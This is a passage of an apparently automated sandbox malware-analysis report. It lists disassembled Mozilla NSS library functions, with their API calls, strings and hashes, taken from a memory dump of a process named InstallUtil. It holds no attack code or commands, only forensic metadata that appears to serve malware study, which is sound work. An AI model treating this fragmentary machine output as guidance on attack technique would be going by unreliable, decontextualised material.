                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C7926E0
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C7926F4
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C79274D
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C7928A9
                                                                                                                    • Part of subcall function 6C7A3440: PK11_GetAllTokens.NSS3 ref: 6C7A3481
                                                                                                                    • Part of subcall function 6C7A3440: PR_SetError.NSS3(00000000,00000000), ref: 6C7A34A3
                                                                                                                    • Part of subcall function 6C7A3440: TlsGetValue.KERNEL32 ref: 6C7A352E
                                                                                                                    • Part of subcall function 6C7A3440: EnterCriticalSection.KERNEL32(?), ref: 6C7A3542
                                                                                                                    • Part of subcall function 6C7A3440: PR_Unlock.NSS3(?), ref: 6C7A355B
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C7927A1
                                                                                                                  • PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C76662E,?,?,?), ref: 6C7927B5
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C7927CE
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7927E8
                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C), ref: 6C792800
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C79F854
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C79F868
                                                                                                                    • Part of subcall function 6C79F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C79F882
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(04C483FF,?,?), ref: 6C79F889
                                                                                                                    • Part of subcall function 6C79F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C79F8A4
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C79F8AB
                                                                                                                    • Part of subcall function 6C79F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C79F8C9
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(280F10EC,?,?), ref: 6C79F8D0
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C792834
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C79284E
                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C), ref: 6C792866
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$CriticalSection$Unlock$Enterfree$DeleteError$K11_calloc$ImportPublicTokens
                                                                                                                  • String ID: .fvl$.fvl
                                                                                                                  • API String ID: 544520609-1336400843
                                                                                                                  • Opcode ID: 5d042cd6e5e29196ec950aaca496c58f76b85ed0385488efaf8039a64f50f07e
                                                                                                                  • Instruction ID: 91681109670d0ccb5498c6155e71dbc46070056f22b7cc751703f1a32f419fa3
                                                                                                                  • Opcode Fuzzy Hash: 5d042cd6e5e29196ec950aaca496c58f76b85ed0385488efaf8039a64f50f07e
                                                                                                                  • Instruction Fuzzy Hash: BEB10670D00205DFDB10EF69EA88BAAB7B4FF09308F104539E905A7B02E731E941CBA1
                                                                                                                  Function 6C7B0550 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 182stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_GetEnvSecure.NSS3(NSS_ALLOW_WEAK_SIGNATURE_ALG,00000002,00000000,?,6C795989), ref: 6C7B0571
                                                                                                                    • Part of subcall function 6C741240: TlsGetValue.KERNEL32(00000040,?,6C74116C,NSPR_LOG_MODULES), ref: 6C741267
                                                                                                                    • Part of subcall function 6C741240: EnterCriticalSection.KERNEL32(?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C74127C
                                                                                                                    • Part of subcall function 6C741240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C741291
                                                                                                                    • Part of subcall function 6C741240: PR_Unlock.NSS3(?,?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C7412A0
                                                                                                                  • PR_GetEnvSecure.NSS3(NSS_HASH_ALG_SUPPORT,?,00000002,00000000,?,6C795989), ref: 6C7B05B7
                                                                                                                  • PORT_Strdup_Util.NSS3(00000000,?,?,00000002,00000000,?,6C795989), ref: 6C7B05C8
                                                                                                                  • strchr.VCRUNTIME140(00000000,0000003B,?,?,?,00000002,00000000,?,6C795989), ref: 6C7B05EC
                                                                                                                  • strstr.VCRUNTIME140(00000001,?), ref: 6C7B0653
                                                                                                                  • free.MOZGLUE(?,?,?,?,00000002,00000000,?,6C795989), ref: 6C7B0681
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800,?,?,?,?,00000002,00000000,?,6C795989), ref: 6C7B06AB
                                                                                                                  • PL_NewHashTable.NSS3(00000000,6C7AFE80,?,6C7FC350,00000000,00000000,?,?,?,?,?,00000002,00000000,?,6C795989), ref: 6C7B06D5
                                                                                                                  • PL_NewHashTable.NSS3(00000000,?,6C7FC350,6C7FC350,00000000,00000000), ref: 6C7B06EC
                                                                                                                  • PL_HashTableAdd.NSS3(?,6C87E618,6C87E618), ref: 6C7B070F
                                                                                                                    • Part of subcall function 6C6D2DF0: PL_HashTableRawAdd.NSS3(?,?,?,?,?), ref: 6C6D2E35
                                                                                                                  • PL_HashTableAdd.NSS3(FFFFFFFF,6C87E618), ref: 6C7B0738
                                                                                                                  • PL_HashTableAdd.NSS3(6C87E634,6C87E634), ref: 6C7B0752
                                                                                                                  • PR_SetError.NSS3(FFFFE001,00000000,?,?,?,?,00000002,00000000,?,6C795989), ref: 6C7B0767
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HashTable$SecureUtil$Arena_CriticalEnterErrorSectionStrdup_UnlockValuefreegetenvstrchrstrstr
                                                                                                                  • String ID: NSS_ALLOW_WEAK_SIGNATURE_ALG$NSS_HASH_ALG_SUPPORT$V$dynamic OID data$flags
                                                                                                                  • API String ID: 514890423-4248967104
                                                                                                                  • Opcode ID: 77ba2b8cb9edf78825c7d54a4f4f08c468beb1a8c10b114d0fdafd08f1b2ae58
                                                                                                                  • Instruction ID: a86b0da3a2d0d0ca3019b76106badfae3c3bab760e2863dfa862775dd93e704a
                                                                                                                  • Opcode Fuzzy Hash: 77ba2b8cb9edf78825c7d54a4f4f08c468beb1a8c10b114d0fdafd08f1b2ae58
                                                                                                                  • Instruction Fuzzy Hash: 6E51E0F1A012825EEB209E358F0DB677BA4AB8235CF180535D828E7B41E735D545CBE5
                                                                                                                  Function 6C794C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C794C4C
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C794C60
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C794CA1
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C794CBE
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C794CD2
                                                                                                                  • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C794D3A
                                                                                                                  • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C794D4F
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C794DB7
                                                                                                                    • Part of subcall function 6C7FDD70: TlsGetValue.KERNEL32 ref: 6C7FDD8C
                                                                                                                    • Part of subcall function 6C7FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7FDDB4
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C794DD7
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C794DEC
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C794E1B
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C794E2F
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C794E5A
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C794E71
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C794E7A
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C794EA2
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C794EC1
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C794ED6
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C794F01
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C794F2A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 759471828-0
                                                                                                                  • Opcode ID: 0bac892a0187a1ad36aef6d2f4bfb15c856b6b78ddd6aead538d82ab7807fc3f
                                                                                                                  • Instruction ID: 306c74baf041c0e133f6fc3af4265fed6b02e7b73bdeecdea093fa456c404dfe
                                                                                                                  • Opcode Fuzzy Hash: 0bac892a0187a1ad36aef6d2f4bfb15c856b6b78ddd6aead538d82ab7807fc3f
                                                                                                                  • Instruction Fuzzy Hash: EFB12175A002069FDF11EF68E989BAA77B8BF0A318F044134ED2597B11E731E961CBD1
                                                                                                                  Function 6C7E6E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C7E6BF7), ref: 6C7E6EB6
                                                                                                                    • Part of subcall function 6C741240: TlsGetValue.KERNEL32(00000040,?,6C74116C,NSPR_LOG_MODULES), ref: 6C741267
                                                                                                                    • Part of subcall function 6C741240: EnterCriticalSection.KERNEL32(?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C74127C
                                                                                                                    • Part of subcall function 6C741240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C741291
                                                                                                                    • Part of subcall function 6C741240: PR_Unlock.NSS3(?,?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C7412A0
                                                                                                                  • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C88FC0A,6C7E6BF7), ref: 6C7E6ECD
                                                                                                                  • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7E6EE0
                                                                                                                  • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C7E6EFC
                                                                                                                  • PR_NewLock.NSS3 ref: 6C7E6F04
                                                                                                                  • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7E6F18
                                                                                                                  • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C7E6BF7), ref: 6C7E6F30
                                                                                                                  • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C7E6BF7), ref: 6C7E6F54
                                                                                                                  • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C7E6BF7), ref: 6C7E6FE0
                                                                                                                  • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C7E6BF7), ref: 6C7E6FFD
                                                                                                                  Strings
                                                                                                                  • NSS_SSL_CBC_RANDOM_IV, xrefs: 6C7E6FF8
                                                                                                                  • SSLKEYLOGFILE, xrefs: 6C7E6EB1
                                                                                                                  • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C7E6F4F
                                                                                                                  • SSLFORCELOCKS, xrefs: 6C7E6F2B
                                                                                                                  • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C7E6FDB
                                                                                                                  • # SSL/TLS secrets log file, generated by NSS, xrefs: 6C7E6EF7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                  • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                  • API String ID: 412497378-2352201381
                                                                                                                  • Opcode ID: dea568d207fa32060883fa9b6d8f5ad6ca48d773f4d053348f3fc0d61c07a3cb
                                                                                                                  • Instruction ID: e4873896923370f1f1e7053965d81d241e22585e186c01b48d9b896b4d492cfa
                                                                                                                  • Opcode Fuzzy Hash: dea568d207fa32060883fa9b6d8f5ad6ca48d773f4d053348f3fc0d61c07a3cb
                                                                                                                  • Instruction Fuzzy Hash: CBA105B3B599C587E760463CCF0138833A6AB9B32EF588775E931C6ED6DB35A440C285
                                                                                                                  Function 6C75C4B0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 247COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C75C4D5
                                                                                                                    • Part of subcall function 6C7ABE30: SECOID_FindOID_Util.NSS3(6C76311B,00000000,?,6C76311B,?), ref: 6C7ABE44
                                                                                                                  • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C75C516
                                                                                                                  • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C75C530
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C75C54E
                                                                                                                  • NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6C75C5CB
                                                                                                                  • VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6C75C712
                                                                                                                  • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C75C725
                                                                                                                  • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C75C742
                                                                                                                  • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C75C751
                                                                                                                  • PL_FinishArenaPool.NSS3(?), ref: 6C75C77A
                                                                                                                  • NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C75C78F
                                                                                                                  • NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C75C7A9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
                                                                                                                  • String ID: security
                                                                                                                  • API String ID: 1085474831-3315324353
                                                                                                                  • Opcode ID: 6610db7c2c6e6d71650a88f546bc2da8bfd840dcdaf7979386786ad60dc459cc
                                                                                                                  • Instruction ID: cb29b9e4c9e041c97288ab22bf5dbf5edb6ee3f690e67cbe6497a89d79e2aa92
                                                                                                                  • Opcode Fuzzy Hash: 6610db7c2c6e6d71650a88f546bc2da8bfd840dcdaf7979386786ad60dc459cc
                                                                                                                  • Instruction Fuzzy Hash: 60810B71C001089BEF00EAA5DE88BEE7774DF0930EFA44535E905A6E91EB31DA69C791
                                                                                                                  Function 6C7C4500 Relevance: 28.8, APIs: 19, Instructions: 319threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SECOID_FindOID_Util.NSS3(6C7C3803,?,6C7C3817,00000000), ref: 6C7C450E
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C758298,?,?,?,6C74FCE5,?), ref: 6C7B07BF
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7B07E6
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B081B
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B0825
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,?,6C7C3817,00000000), ref: 6C7C4550
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(00000004,00000000), ref: 6C7C45B5
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(000000BF,00000000), ref: 6C7C4709
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?,00000000), ref: 6C7C4727
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?,?,00000000), ref: 6C7C473B
                                                                                                                  • PORT_NewArena_Util.NSS3(00000400,?,?,?,?,?,?,?,00000000), ref: 6C7C4801
                                                                                                                  • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C882DA0,?,?,?,?,?,?,?,?,00000000), ref: 6C7C482E
                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C7C48F3
                                                                                                                  • PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C7C4923
                                                                                                                  • PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C7C4937
                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(?,?,?,00000000), ref: 6C7C494E
                                                                                                                  • PR_SetError.NSS3(FFFFE02F,00000000,?,?,?,00000000), ref: 6C7C4963
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7C4984
                                                                                                                  • VFY_VerifyDataWithAlgorithmID.NSS3(?,?,?,6C7C21C2,?,?,?), ref: 6C7C499C
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7C49B5
                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,00000000), ref: 6C7C49C5
                                                                                                                  • PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C7C49DC
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7C49E9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Error$Arena_Tag_$AlgorithmFindFree$DestroyHashLookupPublicTable$ConstCurrentDataEncodeItem_ThreadVerifyWith
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3698863438-0
                                                                                                                  • Opcode ID: 793a139229f35474724d553e3c211a7f04033f05d07160aeaf25e527b00dcfb7
                                                                                                                  • Instruction ID: 479623c5fda126dcf24037c54585f6bdb254fd6053a41fcac408af05c1b4282f
                                                                                                                  • Opcode Fuzzy Hash: 793a139229f35474724d553e3c211a7f04033f05d07160aeaf25e527b00dcfb7
                                                                                                                  • Instruction Fuzzy Hash: C7A103B1F01216AFEF108A65EE84BBE3A75AB0531CF244134ED05A7B81E731D945DBA3
                                                                                                                  Function 6C7BE8C0 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 353memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_ZAlloc_Util.NSS3(0000001C,?,6C7BE853,?,FFFFFFFF,?,?,6C7BB0CC,?,6C7BB4A0,?,00000000), ref: 6C7BE8D9
                                                                                                                    • Part of subcall function 6C7B0D30: calloc.MOZGLUE ref: 6C7B0D50
                                                                                                                    • Part of subcall function 6C7B0D30: TlsGetValue.KERNEL32 ref: 6C7B0D6D
                                                                                                                    • Part of subcall function 6C7BC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7BDAE2,?), ref: 6C7BC6C2
                                                                                                                  • PORT_ArenaMark_Util.NSS3(?), ref: 6C7BE972
                                                                                                                  • PORT_ArenaMark_Util.NSS3(?), ref: 6C7BE9C2
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7BEA00
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C7BEA3F
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C7BEA5A
                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C7BEA81
                                                                                                                  • SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6C7BEA9E
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C7BEACF
                                                                                                                  • PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6C7BEB56
                                                                                                                  • PK11_FreeSymKey.NSS3(00000000), ref: 6C7BEBC2
                                                                                                                  • SECOID_FindOID_Util.NSS3(?), ref: 6C7BEBEC
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7BEC58
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
